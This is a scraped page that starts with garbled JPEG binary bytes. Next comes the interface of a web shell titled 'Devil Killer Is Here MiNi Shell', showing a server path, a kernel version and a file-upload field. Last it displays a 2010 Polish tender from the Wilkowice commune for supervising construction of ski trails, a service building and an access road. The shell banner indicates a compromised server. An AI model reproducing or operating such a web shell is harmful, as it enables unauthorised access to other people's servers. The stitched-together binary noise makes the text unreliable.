JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100915/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100915/292490-N-2010.html

<p class="kh_header"><b>Wilkowice: Pełnienie nadzoru inwestorskiego przy realizacji zadania Budowa tras do narciarstwa biegowego w szczytowych partiach Magurki Wilkowickiej wraz z obsługującym je budynkiem z instalacjami elektryczną, wod-kan, C.O. i przyłączami oraz drogą dojazdową</b><br>
<b>Numer ogłoszenia: 292490 - 2010; data zamieszczenia: 15.09.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Gminy Wilkowice , ul. Wyzwolenia 25, 43-365 Wilkowice, woj. śląskie, tel. 033 4990077 w. 307, faks 033 4990077 w. 420.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Pełnienie nadzoru inwestorskiego przy realizacji zadania Budowa tras do narciarstwa biegowego w szczytowych partiach Magurki Wilkowickiej wraz z obsługującym je budynkiem z instalacjami elektryczną, wod-kan, C.O. i przyłączami oraz drogą dojazdową.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 3.1. Przedmiotem zamówienia jest pełnienie nadzoru inwestorskiego przy realizacji zadania Budowa tras do narciarstwa biegowego w szczytowych partiach Magurki Wilkowickiej wraz z obsługującym je budynkiem z instalacjami elektryczną, wod-kan, C.O. i przyłączami oraz drogą dojazdową.  3.2.  Roboty budowlane stanowiące przedmiot nadzoru obejmują następujące zakresy robót budowlanych w ramach realizacji ww zadania:a) budowa tras do narciarstwa biegowego
Budowa tras polegać będzie na pracach ziemnych i korekcyjnych wycięciach drzew  w obrębie wyznakowanego szlaku narciarsko-spacerowego.Prace ziemne obejmować będą  poszerzenie istniejących traktów leśnych do wymaganych przepisami FIS szerokości. Z trasy muszą zostać usunięte większe kamienie, konary i inne przeszkody. Formowanie nasypów i profilowanie ukształtowania trasy będzie miało charakter korekcyjny, tym samym zostaną zachowane naturalne profile poprzeczne i podłużne terenu. Trasy do narciarstwa biegowego poprowadzono po istniejących drogach leśnych lub polanach. Osie poszczególnych odcinków tras biegowych praktycznie pokrywają się z osiami istniejących dróg leśnych (lub nieznacznie od nich odbiegają) co skutkuje dużą ilością załomów tych tras o niewielkim kącie zwrotu. Przebieg tras uwarunkowany został również przez istniejące zalesienie terenu i konieczność unikania wycinek. Trasy na obszarze polan i terenach z rzadkim zadrzewieniem zaprojektowano o szerokości 6,0 i 9,Om a trasy poprowadzone po istniejących drogach leśnych zaprojektowano o szerokości 4,0m . Nawierzchnie tras narciarstwa biegowego przewiduje się jako gruntowe, naturalne tzn. po wyprofilowaniu korony trasy zgodnie z profilem jej niwelety i spadkami poprzecznymi zostanie ona odpowiednio uwałowana. Nie przewiduje się żadnego dodatkowego utwardzenia powierzchni tras narciarstwa biegowego. b) budowa budynku do obsługi trasy biegowej wraz z instalacjami i przyłączami
Dane techniczne:-	powierzchnia zabudowy; 226,49 m2;-	powierzchnia całkowita kondygnacji: 225,80 m2;-	    powierzchnia kondygnacji netto: 132,32 m2; -	powierzchnia użytkowa: 130,81 m2;-	kubatura: 515,62 m3
Ściany zewnętrzne zaprojektowano jako trójwarstwowe ocieplone wełną mineralną, strop nad parterem monolityczny żelbetowy, pokrycie dachu jako dach odwrócony pokryty warstwą wegetacyjną uzyskaną z górnej warstwy wykopu fundamentowego oraz częściowo na attyce z okładziny z płyty HPL. W obiekcie zastosowano stolarkę drewnianą. Wejście do budynku zaprojektowano poprzez podest wyniesiony ponad poziom terenu zlokalizowany od strony północnej. W poziomie parteru (poz.+- 0.00=904,18 m n.p.m.) zaprojektowana została strefa wejściowa w postaci wiatrołapu, dwa pomieszczenia pracy oraz zaplecze sanitarne z dwoma wc oraz częścią gospodarczą. W budynku przewidziano do wykonania instalację elektryczną, wod-kan oraz C.O. i przyłącza. c) budowa drogi dojazdowej wraz z miejscem do mijania. Drogę dojazdowa podzielono na dwa odcinki oznaczone na planie jako a-w2 i w2-b. Odcinek a-w2 usytuowano niejako wokół budynku istniejącego schroniska a odcinek w2-b poprowadzono przez teren niezadrzewiony z ominięciem projektowanych tras narciarstwa biegowego. Odcinek a-w2 rozpoczyna się w miejscu istniejącej drogi dojazdowej przy schronisku i na całej długości posiada jednakowa szerokość 4,5m. Odcinek w2-b składa się z trzech odcinków prostych połączonych łukami kołowymi o promieniu R=30m i kończy się włączeniem do istniejącej drogi. Odcinek ten do pierwszego łuku kołowego posiada szerokość 4,5m a w dalszej części 3,5m. Ponieważ projektowana droga nie jest drogą publiczną i służyć będzie wyłącznie do sporadycznego przejazdu pojazdów zaopatrzenia schroniska lub pojazdów służb leśnych zastosowano na niej nawierzchnie składająca się z l0cm warstwy kruszywa kamiennego zagęszczonego mechanicznie. Warstwa ta zostanie rozłożona na całej szerokości korony drogi i zgodnie z jej nachyleniem (spadkiem poprzecznym). Bezpośrednio przy odcinku a-w2 drogi dojazdowej zaplanowano wykonanie placu postojowego dla pojazdów (maszyn) typu ratruck służących do odpowiedniego utrzymania tras narciarstwa biegowego. Nawierzchnie tego placu stanowić będą ażurowe płyty betonowe, których otwory wypełnione będą lokalnym gruntem. Wobec powyższego dopuszcza się wykonanie również nawierzchni drogi dojazdowej (obu odcinków) w tej technologii tj. z płyt ażurowych zamiast warstwy kruszywa. 3.3. Forma rozliczenia wynagrodzenia z wykonawcą robót przyjęta dla zadań - ryczałt. 3.4. Warunkiem odbioru zadania Budowa tras do narciarstwa biegowego w szczytowych partiach Magurki Wilkowickiej wraz z obsługującym je budynkiem z instalacjami elektryczną, wod-kan, C.O. i przyłączami oraz drogą dojazdową przez Zamawiającego będzie uzyskanie przez Wykonawcę robót budowlanych homologacji FIS na wybudowaną trasę narciarską, uzyskanie pozwolenia na użytkowanie budynku do obsługi trasy biegowej oraz drogi dojazdowej wraz z miejscem do mijania. 3.5. W trakcie realizacji przedmiotu zamówienia Wykonawca zobowiązany jest do dokumentowania fotograficznego realizowanych robót budowlanych w szczególności ulegających zakryciu, robót zanikowych i przekazywania ich na bieżąco  w wersji  elektronicznej (zapis JPG, płyta DVD) Zamawiającemu. 3.6. W ramach realizacji przedmiotu zamówienia Wykonawca winien współpracować z wyznaczonym przez Zamawiającego ekspertem ds. ochrony środowiska w zakresie spełnienia zapisów decyzji o środowiskowych uwarunkowaniach i raportu o oddziaływaniu przedsięwzięcia na środowisko dotyczących minimalizacji wpływu inwestycji na środowisko przyrodnicze. 3.7. Wykonawca winien szczegółowo zapoznać się z raportem oddziaływania na środowisko i zapisami decyzji o środowiskowych uwarunkowaniach. 3.8. Zadanie realizowane jest w ramach projektu pn. Budowa tras do narciarstwa biegowego w partiach szczytowych Magurki Wilkowickiej realizowanego w ramach projektu kluczowego Rozwój infrastruktury turystycznej Subregionu Południowego w ramach Priorytetu III. Turystyka, Poddziałanie 3.2.2. Infrastruktura około turystyczna  podmioty publiczne Regionalnego Programu Operacyjnego Województwa Śląskiego na lata 2007 - 2013.  3.9. Szczegółowy opis zakresu usług świadczonych w ramach sprawowania nadzoru inwestorskiego oraz sposób realizacji przedmiotu zamówienia zawierają: a)   Wzór umowy - Załącznik Nr 1 do SIWZ, b) Szczegółowy zakres usług świadczonych w ramach sprawowania nadzoru inwestorskiego przy realizacji zadania, a którym mowa w pkt 3.1. - Załącznik Nr 2 do SIWZ. 3.10. Szczegółowy opis robót budowlanych stanowiących przedmiot nadzoru zawierają: a) dokumentacja projektowa, w tym:- projekt wykonawczy tras do narciarstwa biegowego w szczytowych partiach Magurki Wilkowickiej - Droga dojazdowa i trasy narciarstwa biegowego, - projekt budowlany budynku (do obsługi trasy biegowej) wraz z towarzyszącą infrastrukturą, budowę drogi dojazdowej oraz budowę obiektów  małej architektury w obrębie ewidencyjnym Wilkowice, na p.gr.Nr 135/16 (Część architektoniczno - budowlana), - projekt budowlany budynku (do obsługi trasy biegowej) wraz z towarzyszącą infrastrukturą, budowę drogi dojazdowej oraz budowę obiektów  małej architektury w obrębie ewidencyjnym Wilkowice, na p.gr.Nr 135/16 (Tom II - załączniki),  - projekt budowlany budynku (do obsługi trasy biegowej) wraz z towarzyszącą infrastrukturą, budowę drogi dojazdowej oraz budowę obiektów  małej architektury w obrębie ewidencyjnym Wilkowice, na p.gr.Nr 135/16 (Tom III - część rysunkowa), - projekt budowlany budynku (do obsługi trasy biegowej) wraz z towarzyszącą infrastrukturą, budowę drogi dojazdowej oraz budowę obiektów  małej architektury w obrębie ewidencyjnym Wilkowice, na p.gr.Nr 135/16 (Droga dojazdowa), - projekt budowlany budynku (do obsługi trasy biegowej) wraz z towarzyszącą infrastrukturą, budowę drogi dojazdowej oraz budowę obiektów  małej architektury w obrębie ewidencyjnym Wilkowice, na p.gr.Nr 135/16 (Budowa instalacji wod - Kan oraz c.o. wraz z przyłączami), - projekt budowlany budynku (do obsługi trasy biegowej) wraz z towarzyszącą infrastrukturą, budowę drogi dojazdowej oraz budowę obiektów  małej architektury w obrębie ewidencyjnym Wilkowice, na p.gr.Nr 135/16 (część elektryczna), - projekt wykonawczy budynku (do obsługi trasy biegowej) wraz z towarzyszącą infrastrukturą, budowę drogi dojazdowej oraz budowę obiektów  małej architektury w obrębie ewidencyjnym Wilkowice, na p.gr.Nr 135/16 (Część architektoniczna),  - projekt wykonawczy budynku (do obsługi trasy biegowej) wraz z towarzyszącą infrastrukturą, budowę drogi dojazdowej oraz budowę obiektów  małej architektury w obrębie ewidencyjnym Wilkowice, na p.gr.Nr 135/16 (Tom II - część rysunkowa), - projekt wykonawczy budynku obsługującego trasę biegową wraz z drogą dojazdową (Tom III - konstrukcja), - projekt wykonawczy budynku (do obsługi trasy biegowej) wraz z towarzyszącą infrastrukturą, budowę drogi dojazdowej oraz budowę obiektów  małej architektury w obrębie ewidencyjnym Wilkowice, na p.gr.Nr 135/16 - Budowa instalacji wod - Kan oraz c.o. wraz z przyłączami, - projekt wykonawczy budynku (do obsługi trasy biegowej) wraz z towarzyszącą infrastrukturą, budowę drogi dojazdowej oraz budowę obiektów  małej architektury w obrębie ewidencyjnym Wilkowice, na p.gr.Nr 135/16 - część elektryczna,  b) przedmiar robót w tym: - przedmiar - roboty architektoniczno budowlane, - przedmiar - budowa instalacji wod - kan oraz c.o. wraz z przyłączami,
- przedmiar - projekt trasy do narciarstwa biegowego w szczytowych partiach Magurki Wilkowickiej (droga dojazdowa i trasy narciarstwa biegowego),
- przedmiar - budynek obsługujący trasę biegową wraz z drogą dojazdową - roboty elektryczne, c) specyfikacja techniczna wykonania i odbioru robót budowlanych w części zawierającej zbiory wymagań w zakresie sposobu wykonania robót budowlanych, obejmujące wymagania w zakresie właściwości materiałów, wymagania dotyczące sposobu wykonania i oceny prawidłowości wykonania poszczególnych robót, w tym:- Specyfikacja techniczna - Budowa budynku obsługującego trasę biegową,- Specyfikacja techniczna wykonania i odbioru robót budowlanych - budynku (do obsługi trasy biegowej) wraz z towarzyszącą infrastrukturą, budowę drogi dojazdowej oraz budowę obiektów  małej architektury w obrębie ewidencyjnym Wilkowice, na p.gr.Nr 135/16 - budowa instalacji wod - Kan oraz c.o. wraz z przyłączami,- Specyfikacja techniczna wykonania i odbioru robót projekt trasy do narciarstwa biegowego w szczytowych partiach Magurki Wilkowickiej (droga dojazdowa i trasy narciarstwa biegowego),- Specyfikacja techniczna wykonania i odbioru robót budowlanych - roboty w zakresie instalacji elektrycznych wewnętrznych, d) raport oddziaływania na środowisko wraz z decyzją o środowiskowych uwarunkowaniach, e) Umowa użyczenia dróg, szlaków zrywkowych i gruntów leśnych związanych z gospodarką leśną w Leśnictwie Międzybrodzie w celu wykorzystania jako narciarskiej trasy biegowej nr 349/2009 zawarta z Skarbem Państwa PGL LP Nadleśnictwo Andrychów.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.24.70.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O zamówienie publiczne mogą ubiegać się Wykonawcy, którzy wykonali tj. zakończyli w okresie ostatnich trzech lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, przed upływem terminu składania ofert co najmniej jedną usługę odpowiadającą przedmiotowi zamówienia tj. polegającą na pełnieniu nadzoru inwestorskiego przy budowie, przebudowie, np. tras do narciarstwa, dróg w zakresie profilowania, i korytowania o dł. min. 3.000 mb i budowie budynku o powierzchni użytkowej min. 100 m2 wraz z instalacją elektryczną, instalacją wodno kanalizacyjną i c.o. Zamawiający dopuszcza możliwość wykazania przez Wykonawcę spełnienia powyższego warunku w ramach dwóch odrębnych usług tj. jednej obejmującej pełnienie nadzoru inwestorskiego przy budowie, przebudowie, np. tras do narciarstwa, dróg i drugiej obejmującej pełnienie nadzoru inwestorskiego przy budowie budynku wraz z wykonaniem instalacji.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O zamówienie publiczne mogą ubiegać się Wykonawcy, którzy dysponują osobami zdolnymi do wykonania zamówienia, które będą uczestniczyć w wykonywaniu zamówienia: tj.: - osobą, która będzie pełnić funkcję inspektora nadzoru, posiadającą uprawnienia do kierowania robotami budowlanymi określonymi przepisami Prawa budowlanego  w specjalności  konstrukcyjno - budowlanej; - osobą, która będzie pełnić funkcję inspektora nadzoru, posiadającą uprawnienia do kierowania robotami budowlanymi określonymi przepisami Prawa budowlanego  w specjalności  drogowej; - osobą, która będzie pełnić funkcję inspektora nadzoru, posiadającą uprawnienia do kierowania robotami budowlanymi określonymi przepisami Prawa budowlanego  w specjalności  instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, wodociągowych i kanalizacyjnych,  gazowych; - osobą, która będzie pełnić funkcję inspektora nadzoru, posiadającą uprawnienia do kierowania robotami budowlanymi określonymi przepisami Prawa budowlanego  w specjalności  instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych
posiadającymi aktualne ubezpieczenie od odpowiedzialności cywilnej w ramach przynależności do właściwej izby inżynierów budownictwa. Zamawiający dopuszcza połączenie funkcji poszczególnych osób pod warunkiem spełnienia przez osobę łączącą funkcje wszystkich warunków wymaganych dla tych funkcji.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>a) wypełniony Druk Oferta, stanowiący załącznik nr 6 do niniejszej specyfikacji, b) aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej jeżeli wykonawca posiada taki wpis</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zmiany dotyczące zmian w zakresie osób zdolnych do wykonywania przedmiotu umowy:
a)Zmiana którejkolwiek z osób, o których mowa w § 2 ust. 1 umowy, w trakcie realizacji przedmiotu umowy, musi być uzasadniona przez Zleceniobiorcę na piśmie i wymaga zaakceptowania przez Zleceniodawcę. Zleceniodawca zaakceptuje taką zmianę w terminie 7 dni od daty przedłożenia propozycji wyłącznie wtedy, gdy kwalifikacje i doświadczenie wskazanych osób będą spełniać warunki postawione w tym zakresie w Specyfikacji Istotnych Warunków Zamówienia. 
b) Zleceniodawca może także zażądać od Zleceniobiorcy zmiany osób, o których mowa § 2 ust. 1 umowy, jeżeli uzna, że nie wykonują one należycie swoich obowiązków. Zleceniobiorca zobowiązany jest dokonać zmiany tych osób w terminie nie dłuższym niż 7 dni od daty złożenia wniosku przez Zleceniodawcę.
2. Zmiany w zakresie zmian w terminie realizacji umowy: w przypadku wydłużenia terminu rozpoczęcia realizacji zadania, o którym mowa w § 1 ust. 1 umowy, z uwagi na: a) niesprzyjające warunki atmosferyczne uniemożliwiające realizację robót zgodnie ze sztuką budowlaną i  ograniczenia wynikające z decyzji uwarunkowań środowiskowych, b) konieczność realizacji nieprzewidzianych robót dodatkowych uniemożliwiających wykonanie zadania, c) zwłokę wykonawcy robót budowlanych w realizacji zadania, d) wydłużoną procedurę uzyskiwania przez Zleceniodawcę niezbędnych decyzji, uzgodnień, Zleceniobiorca zobowiązany jest wykonywać swoje obowiązki wynikające z treści umowy do czasu zakończenia realizacji zadania w ramach ustalonego w § 7 ust. 1 umowy wynagrodzenia. W takim wypadku strony umowy podpiszą aneks do umowy przedłużający okres wykonywania usługi o czas wydłużenia wykonania zadania wykonawcy usług.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.ugwilkowice.rekord.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Gminy Wilkowice ul. Wyzwolenia 25 43-365 Wilkowice.</p>
